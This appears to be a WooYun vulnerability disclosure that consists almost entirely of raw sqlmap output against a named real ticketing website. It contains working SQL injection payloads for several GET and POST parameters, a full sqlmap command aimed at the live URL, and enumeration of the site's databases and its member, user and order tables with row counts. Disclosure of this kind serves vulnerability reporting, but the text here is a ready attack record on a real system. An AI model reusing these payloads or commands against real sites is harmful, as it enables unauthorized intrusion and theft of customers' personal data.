WooYun.org

[*] starting at 12:28:48
[12:28:48] [INFO] testing connection to the target URL
[12:28:49] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[12:28:51] [INFO] target URL is stable
[12:28:51] [INFO] testing if GET parameter 'Name' is dynamic
[12:28:51] [INFO] confirming that GET parameter 'Name' is dynamic
[12:28:52] [INFO] GET parameter 'Name' is dynamic
[12:28:52] [WARNING] reflective value(s) found and filtering out
[12:28:53] [WARNING] heuristic (basic) test shows that GET parameter 'Name' migh
t not be injectable
[12:28:53] [INFO] testing for SQL injection on GET parameter 'Name'
[12:28:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:29:01] [INFO] GET parameter 'Name' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[12:29:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:29:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:29:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:29:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:29:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:29:02] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[12:29:05] [INFO] checking if the injection point on GET parameter 'Name' is a f
alse positive
[12:29:08] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'Name' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[12:29:22] [INFO] testing if GET parameter 'Source' is dynamic
[12:29:22] [WARNING] GET parameter 'Source' does not appear dynamic
[12:29:23] [WARNING] heuristic (basic) test shows that GET parameter 'Source' mi
ght not be injectable
[12:29:23] [INFO] testing for SQL injection on GET parameter 'Source'
[12:29:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:29:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:29:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:29:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:29:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:29:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:30:28] [WARNING] GET parameter 'Source' is not injectable
sqlmap identified the following injection points with a total of 153 HTTP(s) req
uests:
---
Place: GET
Parameter: Name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Name=1%' AND 8999=8999 AND '%'='&Source=key
---
[12:30:28] [INFO] testing Microsoft SQL Server
[12:30:29] [INFO] confirming Microsoft SQL Server
[12:30:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[12:33:18] [INFO] fetching current user
[12:33:18] [INFO] retrieving the length of query output
[12:33:18] [INFO] retrieved:
[12:33:19] [WARNING] reflective value(s) found and filtering out
8
[12:33:46] [INFO] retrieved: web61247
current user:    'web61247'
[12:33:46] [INFO] fetching current database
[12:33:46] [INFO] retrieving the length of query output
[12:33:46] [INFO] retrieved: 14
[12:34:28] [INFO] retrieved: www_51piao_com
current database:    'www_51piao_com'
[12:34:28] [INFO] testing if current user is DBA
[12:34:28] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[12:39:25] [INFO] fetching database names
[12:39:25] [INFO] fetching number of databases
[12:39:25] [INFO] retrieved:
[12:39:26] [WARNING] reflective value(s) found and filtering out
7
[12:39:31] [INFO] retrieving the length of query output
[12:39:31] [INFO] retrieved:
[12:39:32] [INFO] retrieved:
[12:39:33] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[12:39:33] [INFO] retrieving the length of query output
[12:39:33] [INFO] retrieved:
[12:39:34] [INFO] retrieved:
[12:39:35] [INFO] retrieving the length of query output
[12:39:35] [INFO] retrieved:
[12:39:35] [INFO] retrieved:
[12:39:37] [INFO] retrieving the length of query output
[12:39:37] [INFO] retrieved:
[12:39:37] [INFO] retrieved:
[12:39:39] [INFO] retrieving the length of query output
[12:39:39] [INFO] retrieved:
[12:39:39] [INFO] retrieved:
[12:39:41] [INFO] retrieving the length of query output
[12:39:41] [INFO] retrieved:
[12:39:41] [INFO] retrieved:
[12:39:42] [INFO] retrieving the length of query output
[12:39:42] [INFO] retrieved:
[12:39:43] [INFO] retrieved:
[12:39:44] [INFO] retrieving the length of query output
[12:39:44] [INFO] retrieved: 14
[12:40:27] [INFO] retrieved: www_51piao_com
[12:40:27] [INFO] retrieving the length of query output
[12:40:27] [INFO] retrieved: 6
[12:40:52] [INFO] retrieved: master
[12:40:52] [INFO] retrieving the length of query output
[12:40:52] [INFO] retrieved: 6
[12:41:23] [INFO] retrieved: tempdb
[12:41:23] [INFO] retrieving the length of query output
[12:41:23] [INFO] retrieved: 5
[12:41:49] [INFO] retrieved: model
[12:41:49] [INFO] retrieving the length of query output
[12:41:49] [INFO] retrieved: 4
[12:42:06] [INFO] retrieved: msdb
[12:42:06] [INFO] retrieving the length of query output
[12:42:06] [INFO] retrieved: 4
[12:42:25] [INFO] retrieved: pubs
[12:42:25] [INFO] retrieving the length of query output
[12:42:25] [INFO] retrieved: 9
[12:42:54] [INFO] retrieved: Northwind
[12:42:54] [INFO] retrieving the length of query output
[12:42:54] [INFO] retrieved: 14
[12:43:38] [INFO] retrieved: www_51piao_com
[12:43:38] [INFO] retrieving the length of query output
[12:43:38] [INFO] retrieved:
[12:43:41] [INFO] retrieved:
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] www_51piao_com
实在太慢了，测试主站的时候收集的信息，简单测试一下
sqlmap.py -u "http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key" --threads 10 --dbms "Microsoft SQL Server" --count -T Member,vMember,Users,vUserMag -D www_51piao_com
看来又有用户增加了哦！~~~
[12:45:21] [INFO] retrieved:
[12:45:22] [WARNING] reflective value(s) found and filtering out
198781
[12:45:39] [INFO] retrieved: 198781
[12:45:58] [INFO] retrieved: 116
[12:46:06] [INFO] retrieved: 116
Database: www_51piao_com
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.Member   | 198781  |
| dbo.vMember  | 198781  |
| dbo.Users    | 116     |
| dbo.vUserMag | 116     |
+--------------+---------+
[12:49:16] [INFO] retrieved:
[12:49:18] [WARNING] reflective value(s) found and filtering out
960727
Database: www_51piao_com
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.OrderLog | 960727  |
+--------------+---------+

[*] starting at 12:52:43
[12:52:43] [INFO] testing connection to the target URL
[12:52:43] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[12:52:45] [INFO] target URL is stable
[12:52:45] [INFO] testing if GET parameter 'Name' is dynamic
[12:52:45] [WARNING] GET parameter 'Name' does not appear dynamic
[12:52:46] [WARNING] heuristic (basic) test shows that GET parameter 'Name' migh
t not be injectable
[12:52:46] [INFO] testing for SQL injection on GET parameter 'Name'
[12:52:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:52:46] [WARNING] reflective value(s) found and filtering out
[12:52:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:52:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:52:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:53:17] [INFO] GET parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
stacked queries' injectable
[12:53:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:53:38] [INFO] GET parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[12:53:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:53:38] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[12:53:42] [INFO] target URL appears to be UNION injectable with 1 columns
[12:53:43] [INFO] checking if the injection point on GET parameter 'Name' is a f
alse positive
[12:54:05] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'Name' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[12:54:14] [INFO] testing if GET parameter 'Source' is dynamic
[12:54:14] [WARNING] GET parameter 'Source' does not appear dynamic
[12:54:15] [WARNING] heuristic (basic) test shows that GET parameter 'Source' mi
ght not be injectable
[12:54:15] [INFO] testing for SQL injection on GET parameter 'Source'
[12:54:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:54:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:54:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:54:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:54:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:54:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:55:12] [WARNING] GET parameter 'Source' is not injectable
[12:55:12] [INFO] testing if GET parameter 'tickettypeid' is dynamic
[12:55:12] [WARNING] GET parameter 'tickettypeid' does not appear dynamic
[12:55:12] [WARNING] heuristic (basic) test shows that GET parameter 'tickettype
id' might not be injectable
[12:55:12] [INFO] testing for SQL injection on GET parameter 'tickettypeid'
[12:55:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:55:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:55:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:55:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:55:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:55:34] [WARNING] GET parameter 'tickettypeid' is not injectable
[12:55:34] [INFO] testing if GET parameter 'ticketdays' is dynamic
[12:55:35] [WARNING] GET parameter 'ticketdays' does not appear dynamic
[12:55:36] [WARNING] heuristic (basic) test shows that GET parameter 'ticketdays
' might not be injectable
[12:55:36] [INFO] testing for SQL injection on GET parameter 'ticketdays'
[12:55:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:55:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:55:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:55:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:55:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:56:32] [WARNING] GET parameter 'ticketdays' is not injectable
[12:56:32] [INFO] testing if GET parameter 'ticketaddrid' is dynamic
[12:56:33] [WARNING] GET parameter 'ticketaddrid' does not appear dynamic
[12:56:33] [WARNING] heuristic (basic) test shows that GET parameter 'ticketaddr
id' might not be injectable
[12:56:33] [INFO] testing for SQL injection on GET parameter 'ticketaddrid'
[12:56:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:56:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[12:56:40] [INFO] GET parameter 'ticketaddrid' is 'Microsoft SQL Server/Sybase A
ND error-based - WHERE or HAVING clause' injectable
[12:56:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:56:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:57:01] [INFO] GET parameter 'ticketaddrid' seems to be 'Microsoft SQL Server
/Sybase stacked queries' injectable
[12:57:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:57:21] [INFO] GET parameter 'ticketaddrid' seems to be 'Microsoft SQL Server
/Sybase time-based blind' injectable
[12:57:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:57:26] [INFO] GET parameter 'ticketaddrid' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable
GET parameter 'ticketaddrid' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] y
sqlmap identified the following injection points with a total of 420 HTTP(s) req
uests:
---
Place: GET
Parameter: ticketaddrid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26) AND
 6888=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(98)+CHAR(97)+CHAR(113)+(SELEC
T (CASE WHEN (6888=6888) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+C
HAR(121)+CHAR(109)+CHAR(113))) AND (8421=8421
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26) UNI
ON ALL SELECT CHAR(113)+CHAR(116)+CHAR(98)+CHAR(97)+CHAR(113)+CHAR(105)+CHAR(66)
+CHAR(112)+CHAR(80)+CHAR(75)+CHAR(100)+CHAR(114)+CHAR(88)+CHAR(109)+CHAR(103)+CH
AR(113)+CHAR(108)+CHAR(121)+CHAR(109)+CHAR(113)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26); WA
ITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26) WAI
TFOR DELAY '0:0:5'--
Place: GET
Parameter: Name
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Name=1'); WAITFOR DELAY '0:0:5'--&Source=key&tickettypeid=3&ticketd
ays=30&ticketaddrid=26
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Name=1') WAITFOR DELAY '0:0:5'--&Source=key&tickettypeid=3&ticketda
ys=30&ticketaddrid=26
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: Name, type: Single quoted string (default)
[1] place: GET, parameter: ticketaddrid, type: Unescaped numeric
[q] Quit
> 1
[12:57:41] [INFO] testing Microsoft SQL Server
[12:57:41] [INFO] confirming Microsoft SQL Server
[12:57:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[12:57:42] [INFO] fetching current user
current user:    'web61247'
[12:57:42] [INFO] fetching current database
current database:    'www_51piao_com'
[12:57:42] [INFO] testing if current user is DBA
current user is DBA:    False

[*] starting at 13:03:36
[13:03:36] [INFO] testing connection to the target URL
[13:03:37] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[13:03:38] [INFO] target URL is stable
[13:03:38] [INFO] testing if GET parameter 'name' is dynamic
[13:03:39] [INFO] confirming that GET parameter 'name' is dynamic
[13:03:39] [INFO] GET parameter 'name' is dynamic
[13:03:40] [WARNING] reflective value(s) found and filtering out
[13:03:40] [WARNING] heuristic (basic) test shows that GET parameter 'name' migh
t not be injectable
[13:03:40] [INFO] testing for SQL injection on GET parameter 'name'
[13:03:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:03:49] [INFO] GET parameter 'name' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:03:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:03:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:03:49] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[13:03:53] [INFO] checking if the injection point on GET parameter 'name' is a f
alse positive
[13:03:56] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
n patch). Potential problems in enumeration phase can be expected
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
[13:03:59] [INFO] testing if GET parameter 'style' is dynamic
[13:03:59] [INFO] confirming that GET parameter 'style' is dynamic
[13:04:00] [INFO] GET parameter 'style' is dynamic
[13:04:00] [WARNING] heuristic (basic) test shows that GET parameter 'style' mig
ht not be injectable
[13:04:00] [INFO] testing for SQL injection on GET parameter 'style'
[13:04:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:04:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:04:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:04:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:04:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:04:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:04:53] [WARNING] GET parameter 'style' is not injectable
[13:04:53] [INFO] testing if GET parameter 'sort' is dynamic
[13:04:53] [WARNING] GET parameter 'sort' does not appear dynamic
[13:04:54] [WARNING] heuristic (basic) test shows that GET parameter 'sort' migh
t not be injectable
[13:04:54] [INFO] testing for SQL injection on GET parameter 'sort'
[13:04:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:05:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:05:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:05:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:05:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:05:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:06:01] [WARNING] GET parameter 'sort' is not injectable
sqlmap identified the following injection points with a total of 253 HTTP(s) req
uests:
---
Place: GET
Parameter: name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=12%' AND 1810=1810 AND '%'='&style=&sort=
---
[13:06:01] [INFO] testing Microsoft SQL Server
[13:06:02] [INFO] confirming Microsoft SQL Server
[13:06:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[13:06:03] [INFO] fetching current user
[13:06:03] [INFO] retrieving the length of query output
[13:06:03] [INFO] retrieved: 8
[13:06:29] [INFO] retrieved: web61247
current user:    'web61247'
[13:06:29] [INFO] fetching current database
[13:06:29] [INFO] retrieving the length of query output
[13:06:29] [INFO] retrieved: 14
[13:07:10] [INFO] retrieved: www_51piao_com
current database:    'www_51piao_com'
[13:07:10] [INFO] testing if current user is DBA
[13:07:10] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False

http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key&tickettypeid=3&ticketdays=30&ticketaddrid=26 (POST)
__VIEWSTATE=dDwzOTI0MzMwMDQ7dDw7bDxpPDE%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjtpPDE
%2BO2k8ND47aTw1PjtpPDk%2BOz47bDx0PHA8bDxfIUl0ZW1Db3VudDs%2BO2w8aTw5Pjs%2BPjtsPGk8MD47aTwxPjtpPDI
%2BO2k8Mz47aTw0PjtpPDU%2BO2k8Nj47aTw3PjtpPDg%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8QDwxO%2Ba8lOWUseS8mjs
%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxAPDI76K%2Bd5Ymn5q2M5YmnOz47Oz47Pj47dDw7bDxpPDA
%2BOz47bDx0PEA8NTvoiJ7ouYjoiq3olb47Pjs7Pjs%2BPjt0PDtsPGk8MD47PjtsPHQ8QDwzO%2Bmfs%2BS5kOS8mjs%2BOzs
%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxAPDMwO%2BaIj%2BWJp%2Be7vOiJujs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs
%2BO2w8dDxAPDQ4O%2BWEv%2BerpeS6suWtkDs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxAPDU3O%2BeUn
%2Ba0u%2BacjeWKoTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs
%2BO2w8dDxAPDk755S15b2x5L2T6IKyOz47Oz47Pj47dDw7bDxpPDA
%2BOz47bDx0PEA8NTM75p2C5oqA6a2U5pyvOz47Oz47Pj47Pj47dDxwPGw8XyFJdGVtQ291bnQ7PjtsPGk8NT47Pj47bDxpPDA
%2BO2k8MT47aTwyPjtpPDM%2BO2k8ND47PjtsPHQ8O2w8aTwwPjs
%2BO2w8dDxAPDE75LuK5aSpOz47Oz47Pj47dDw7bDxpPDA%2BOz47bDx0PEA8MzvkuInlpKnlhoU7Pjs7Pjs
%2BPjt0PDtsPGk8MD47PjtsPHQ8QDw3O%2BS4gOWRqOWGhTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs
%2BO2w8dDxAPDE0O%2BS6jOWRqOWGhTs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxAPDMwO
%2BS4gOS4quaciOWGhTs%2BOzs%2BOz4%2BOz4%2BO3Q8cDxsPF8hSXRlbUNvdW50Oz47bDxpPDEwPjs
%2BPjs7Pjt0PHA8bDxfIUl0ZW1Db3VudDs%2BO2w8aTwyPjs%2BPjtsPGk8MD47aTwxPjs%2BO2w8dDw7bDxpPDA
%2BOz47bDx0PEA8c2VsX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0mdGlja2V0dHlwZWlkPSZ
0aWNrZXRkYXlzPTMwJnRpY2tldHByaWNlPSZuYW1lPTEmc3R5bGU9JnNvcnQ9JnByaWNlMT0mcHJpY2UyPSZkYXkxPSZkYXkyPTv
ljJfkuqw7Pjs7Pjs
%2BPjt0PDtsPGk8MD47PjtsPHQ8QDxub25fc2VhcmNoO1RpY2tldExpc3QuYXNweD9jaXR5aWQ9MTU3JnRpY2tldGFkZHJpZD0md
Glja2V0dHlwZWlkPSZ0aWNrZXRkYXlzPTMwJnRpY2tldHByaWNlPSZuYW1lPTEmc3R5bGU9JnNvcnQ9JnByaWNlMT0mcHJpY2UyP
SZkYXkxPSZkYXkyPTvkuIrmtbc7Pjs7Pjs%2BPjs%2BPjt0PHA8bDxfIUl0ZW1Db3VudDs%2BO2w8aTw1Pjs
%2BPjtsPGk8MD47aTwxPjtpPDI%2BO2k8Mz47aTw0Pjs%2BO2w8dDw7bDxpPDA
%2BOz47bDx0PEA8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0yNiZ0aWNrZXR0eXBlaW
Q9MyZ0aWNrZXRkYXlzPTMwJnRpY2tldHByaWNlPTAsMTAwJm5hbWU9MSZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9JmRh
eTE9JmRheTI9OzEwMOWFg%2BS7peS4izs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs
%2BO2w8dDxAPG5vbl9zZWFyY2g7VGlja2V0TGlzdC5hc3B4P2NpdHlpZD0xMSZ0aWNrZXRhZGRyaWQ9MjYmdGlja2V0dHlwZWlk
PTMmdGlja2V0ZGF5cz0zMCZ0aWNrZXRwcmljZT0xMDEsMzAwJm5hbWU9MSZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI9Jm
RheTE9JmRheTI9OzEwMS0zMDDlhYM7Pjs7Pjs
%2BPjt0PDtsPGk8MD47PjtsPHQ8QDxub25fc2VhcmNoO1RpY2tldExpc3QuYXNweD9jaXR5aWQ9MTEmdGlja2V0YWRkcmlkPTI2Jn
RpY2tldHR5cGVpZD0zJnRpY2tldGRheXM9MzAmdGlja2V0cHJpY2U9MzAxLDUwMCZuYW1lPTEmc3R5bGU9JnNvcnQ9JnByaWNl
MT0mcHJpY2UyPSZkYXkxPSZkYXkyPTszMDEtNTAw5YWDOz47Oz47Pj47dDw7bDxpPDA
%2BOz47bDx0PEA8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0yNiZ0aWNrZXR0eXBlaW
Q9MyZ0aWNrZXRkYXlzPTMwJnRpY2tldHByaWNlPTUwMSwxMDAwJm5hbWU9MSZzdHlsZT0mc29ydD0mcHJpY2UxPSZwcmljZTI
9JmRheTE9JmRheTI9OzUwMS0xMDAw5YWDOz47Oz47Pj47dDw7bDxpPDA
%2BOz47bDx0PEA8bm9uX3NlYXJjaDtUaWNrZXRMaXN0LmFzcHg/Y2l0eWlkPTExJnRpY2tldGFkZHJpZD0yNiZ0aWNrZXR0eXBlaW
Q9MyZ0aWNrZXRkYXlzPTMwJnRpY2tldHByaWNlPTEwMDAmbmFtZT0xJnN0eWxlPSZzb3J0PSZwcmljZTE9JnByaWNlMj0mZGF5
MT0mZGF5Mj07MTAwMOWFg%2BS7peS4ijs%2BOzs
%2BOz4%2BOz4%2BOz4%2BOz4%2BOz4%2BOz4%3D&TicketSearch1:KeyWord=12&TicketSearch1:BtnSearchKey=
%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=

sqlmap got a 302 redirect to 'http://m.51piao.com/Ticket/TicketList.aspx'. Do yo
u want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data
 to a new location? [Y/n] n
[13:08:17] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[13:08:19] [INFO] ignoring POST parameter '__VIEWSTATE'
[13:08:19] [WARNING] POST parameter 'TicketSearch1:KeyWord' does not appear dyna
mic
[13:08:19] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:KeyWord' might not be injectable
[13:08:19] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Key
Word'
[13:08:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:20] [WARNING] reflective value(s) found and filtering out
[13:08:26] [INFO] POST parameter 'TicketSearch1:KeyWord' seems to be 'AND boolea
n-based blind - WHERE or HAVING clause' injectable
[13:08:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:08:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:08:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:08:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:08:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:08:28] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[13:08:39] [INFO] checking if the injection point on POST parameter 'TicketSearc
h1:KeyWord' is a false positive
POST parameter 'TicketSearch1:KeyWord' is vulnerable. Do you want to keep testin
g the others (if any)? [y/N] y
[13:08:47] [WARNING] POST parameter 'TicketSearch1:BtnSearchKey' does not appear
 dynamic
[13:08:47] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:BtnSearchKey' might not be injectable
[13:08:47] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Btn
SearchKey'
[13:08:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:08:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:09:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:09:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:09:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:09:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:09:59] [WARNING] POST parameter 'TicketSearch1:BtnSearchKey' is not injectab
le
[13:09:59] [WARNING] POST parameter 'TicketSearch1:Day1' does not appear dynamic
[13:10:00] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Day1' might not be injectable
[13:10:00] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Day
1'
[13:10:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:10:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:10:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:10:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:10:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:10:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:11:10] [WARNING] POST parameter 'TicketSearch1:Day1' is not injectable
[13:11:10] [WARNING] POST parameter 'TicketSearch1:Day2' does not appear dynamic
[13:11:11] [WARNING] heuristic (basic) test shows that POST parameter 'TicketSea
rch1:Day2' might not be injectable
[13:11:11] [INFO] testing for SQL injection on POST parameter 'TicketSearch1:Day
2'
[13:11:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:11:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:11:25] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:11:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
